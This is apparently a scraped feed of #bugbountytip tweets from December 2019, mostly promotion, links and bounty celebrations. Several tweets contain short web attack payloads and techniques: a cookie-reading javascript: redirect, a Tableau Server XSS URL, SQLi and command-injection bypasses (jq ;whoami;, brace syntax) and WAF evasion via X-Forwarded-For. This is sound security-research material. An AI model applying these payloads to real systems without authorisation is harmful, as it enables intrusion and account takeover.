2019-12-17 15:31:24
2 Flexing of the day 😇 (impact took a beating) If you need help/tips -> reply below with SPECIFIC questions other than where to start, how to get crit, etc #bugbountytip https://t.co/GGpecf900H
Dhamu
@Dhamu_offi


2019-12-17 10:44:05
1 #bugbountytip #bugbounty Abusing feature to steal your tokens https://t.co/jN2AvQDQ7i
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 10:20:33
2 Best guideline to become a Web Application Security Researcher in my opinion https://t.co/uVslvJiX80 #EthicalHacking #EthicalHacker #Hacking #Hacker #WebSecurity #BugBounty #bugbountytip #bugbountytips #netsec #AppSec #InfoSec #ITsecurity #CyberSecurity #Pentesting #pentest
Dhamu
@Dhamu_offi


2019-12-17 10:17:30
7 #bugbountytip #bugbounty Hacking GitHub with Unicode's dotless 'I'. #Vulnerability: Password reset emails delıvered to the wrong address. https://t.co/VKRlN2AxdH
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 09:33:35
5 Facebook Bug Bounty Resources by Philippe Harewood https://t.co/bpGdyUXc98 #Facebook #FB #BugBounty #bugbountytip #bugbountytips #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #WhiteHatHackers #AppSec #InfoSec #ITSecurity #CyberSecurity #Pentesting #Pentest https://t.co/hXoBqe1G5V
Avanish Pathak
@avanish46


2019-12-17 03:18:52
3 I earned $750 on @Bugcrowd . Capture the Account Creation Request On BurpSuite, Most of the case you'll find the redirect request in burp but not on the web : - [ https.//www.TARGET.com/account-created?redirectUrl=javascript:alert(document.cookie)// ] #bugbounty #bugbountytip https://t.co/Mxy2TieMIh
Ammar Amer🇸🇾
@cry__pto


2019-12-17 00:38:05
7 113 #OSINT TIPS created by me and the number of tips will get higher every day until it reach 1000 tips. New Updates. https://t.co/gNMSDGULS6 #Hacking #PenTest #bugbountytips #redteam #CyberSecurity #infosec #bugbountytip
Tirtha Mandal
@tirtha_mandal


2019-12-16 23:01:04
1 First time I successfully reproduced HTTP Desync attack on a bug bounty program. Thank you @synack @SynackRedTeam 🤩 #synack #srt #redteam #bugbountytip #httpdsync https://t.co/zlPjFgXbHS
Ben Tai
@ben_tby


2019-12-16 21:07:28
4 Just a few days before I was simultaneously celebrating my first and second reward, and today I'm proudly celebrating my third reward. Thank you, @Hacker0x01 #BugBounty #bugbountytip #Hacking https://t.co/CcftdtdQya https://t.co/aADPguvhzk
bugbountytip
@a_l_e_r_t_1_


2019-12-16 18:05:36
0 https://t.co/pjFDcvvJCX I'm a newbie on bug bounty. When I'm working I'm streaming on Twitch. Please check my channel and follow me 😂. #bugbountytip #bugbounytips
Simpliv
@simplivllc


2019-12-16 16:00:07
1 This Self-paced Course Teaches You In Detail About [Ethical Hacking] Click Here To Sign Up #Hacking #Cybersecurity #bugbountytip #networking @StartGrowthHack @cry__pto @Pavandep8 @simplivllc https://t.co/6Q7g0olioK https://t.co/qEolSxBN7w
bug bounty tips - Retweet
@BugbountytipsR


2019-12-16 15:23:05
0 SQLi Without Quotes One of the BEST and SIMPLE BYPA$$ by @rodoassis username = \ password = INPUT2 SELECT * FROM login WHERE username = '{\' AND password = }'$INPUT2'; Part inside { } is considered as string https://t.co/mVDuuArf5Z #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-16 14:51:19
0 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/8tbkOCbFgM
Evgeny Larin
@godexmachine


2019-12-16 13:15:39
0 You can identify the Laravel framework by laravel_session cookie, then make a potential illegal request like POST, PUT, etc to check if debug mode is enabled. #BugBountyTip #BugBounty
TomNomNom
@TomNomNom


2019-12-16 11:00:27
9 If you need an element other than <a> for DOM Clobbering (i.e. one that returns an attribute value instead of '[Object HTMLElement]' when you call .toString() on it), you can use <area> with an href attribute #bugBountyTip https://t.co/YCSMhhPK61
noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat ✪
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect not occurs but there are hints that this could work in particular cases, don't give up and continues fuzz! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan 🇮🇳
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if respond remain same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK
ᴂ
@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd
ᴂ
@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href if these js codes are going into any sink without encoding it's Dom XSS E.g var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report.I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping 😴 #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience – not luck – to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that give you access to a privilege account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPOND of SERVER INTERCEPT RESPOND CHANGE IT use BURP Changed Respond to Bypass Authentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSS🎉️ #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreams⛷️, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everywhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didn’t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, don’t question reason, just do it. Trust me, you’ll like it. I love you and you love me, then go do it. Subscribe, it’s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar Amer🇸🇾
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 i reported a critical bug in a 3rd party website company confirmed that this is critical even if is out of scope ,HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 😟
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper 💻
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 16:21:04
4 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? 🔒 Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me and save time looking for XSS manually. https://t.co/4ppKTLDCeN
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:47:33
0 💰Keep Following Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi - Tutorial Coming Soon 💰💰 Keep Following Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Coming Soon ! Keep Following ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If you’re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
0 firebase database It’s one of the easier win for #BugBoundy you can easily look for it on google using Site:.firebaseio.com/.json but google doesn’t give you results but if use bing you can get results Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimble’s Privacy Model Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflare’s Lightweight Network Vulnerability Scanner -- Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-07 23:54:02
2 i have finished building my github repository which talk about #OSINT.a very important repository for ethical hackers and and #BugBounty hunters and of course #OSINT lovers the repository for now contain 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ŞAHİN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeR☢
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures 😓
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks 🦞 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
Ammar Amer🇸🇾
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're Testing for SSRF or blind XXE and it should takes time to be executed or Invalidated redirections to steal tokens : https://t.co/uHMg4rJD69 This tool is awesome to Test for those kind of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is there anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injection Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 second delay. It is all.
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood 🇵🇰
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro 😎 Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is duplicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 ⚠️Open staging environments can lead to production account takeover ✔️If they use a separate DB, but same JWT secret ✔️If the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
